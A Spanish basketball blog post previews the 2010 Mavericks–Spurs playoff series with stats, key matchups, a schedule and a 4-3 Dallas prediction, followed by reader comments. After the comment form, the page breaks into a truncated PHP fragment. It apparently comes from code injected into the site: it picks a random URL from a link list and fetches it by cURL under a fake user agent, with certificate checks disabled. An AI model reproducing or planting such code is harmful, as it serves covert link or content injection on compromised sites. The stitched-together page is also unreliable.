Análisis Dallas Mavericks vs San Antonio Spurs

18 de April de 2010 por TheDeerHunter

Regular: 3-1 para Dallas

Mavericks: P. Favor: 102 – P. Contra: 99,3
Spurs:
P. Favor: 101,4 – P. Contra: 96,3

El derbi tejano se ha convertido por méritos propios en un clásico de nuestro tiempo. Ni más ni menos que esta será la 5ª vez que se vean las caras en postemporada durante la última década y derimirá el empate técnico que persiste en este emparejamiento.
El precedente más reciente tuvo lugar la temporada pasada, cuando los Mavs apenas tuvieron oposición contra unos Spurs muy mermados por las lesiones.

Este año, Cuban ha movido bien sus últimas cartas de tahúr de “saloon” y parece un grupo mucho más competitivo que el de antaño. Haywood y Butler compensan una de las plantillas más potentes de toda competición. Por su parte los Spurs no han encontrado en Jefferson la pieza ideal que buscaban, pero se ha recuperado a Ginobili al máximo nivel, y también llegará Parker, juntando al triplete glorioso de Popovic por primera vez desde hace mucho tiempo. El dato de que los Mavs se han llevado 8 de los 10 últimos enfrentamientos para mí es un espejismo.

Claves:

– Segundas juventudes: Tras el All-Star Manu Ginobili ha incrementado sus promedios nada menos que en casi 10 puntos. Ha mostrado un nivel que apenas tiene precedentes en su carrera. Una carrera plagada de triunfos, como sabemos todos. Yo de Carlisle estaría preocupado.
Lo mismo podemos decir con respecto a Jason Kidd. Su producción también desde el all-star tiene muy poco que envidiar a la del Jason Kidd de los Nets. El mismo que tocó con los dedos algún que otro anillo y MVPs. Una de las armas de estos Spurs es Toni Parker de que se tendrá que ocupar. Buena parte del resultado de la serie se decidirá en este duelo.

– La furia de los Titanes: Un duelo entre posiblemente los dos mejores 4 de la década y de los mejores de la historia es un acontecimiento para celebrar y disfrutar. Tanto Duncan como Nowitzki todavía son capaces de desequilibrar eliminatorias por sí sólos.

– Duelo de banquillos: El libreto de Popovic contra el de Carlisle. Ambos entrenadores ilustres. Ojito porque la diferencia de defensas a favor de los de Popovic es superior a la diferencia de los ataques. Carlisle todavía no ha logrado imprimir su sello defensivo en este equipo pero también hay que señalar que las variantes tácticas que tiene a su disposición están más diversificadas en una plantilla superior.

– Nunca subestimes el corazón de un campeón: Tanto por los precedentes más cercanos como por las sensaciones que transmiten ambas plantillas los Mavericks pueden caer en la trampa de la confianza. A priori ellos deben de asumir el papel de favorito asociado a lo que debe de ser un 2º contra un 7º clasificado, pero plenamente conscientes de que los Spurs no son el típico 7º. Un equipo tan experimentado y capaz como ese puede hacer sangre del más mínimo error.

Agenda:

– P1: Domingo 18 a las 2h (horario España)
– P2: Miércoles 21 a las 3:30h
– P3: Viernes 23 a las 3:30h
– P4: Domingo 25 a la 1h

Pronóstico:

4-3 Dallas

Comenta

5 comentarios a esta entrada

  1. sergio dice:
    #1

    Para mí, “Manudona” es el jugador más creativo ofensivamente de la última década junto a Kobe Bryant… Le he visto hacer cosas que solo había visto en streetbasket

      Citar

  2. Txusma dice:
    #2

    Yo también apuesto por los Mavs pero con Duncan, Parker y Ginobilid delante, todo es posible.

      Citar

  3. Mariano dice:
    #3

    Yo apuesto por los Spurs de cabeza.. ganan 4-3 en una serie qe será muy apasionante..

    Estos serán los mejores PO de Manu…

      Citar

  4. Love Denise dice:
    #4

    yo apuesto por Mavs….como campeón del Oeste.

      Citar

  5. Tobal dice:
    #5

    Yo apuesto por mi equipo,Dallas Mavericks al que veo en buena forma,eso sí con todos los respetos hacia los Spurs,que son peligrosos en cualquier momento,aunque dependen mucho de Duncan y Ginóbili.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>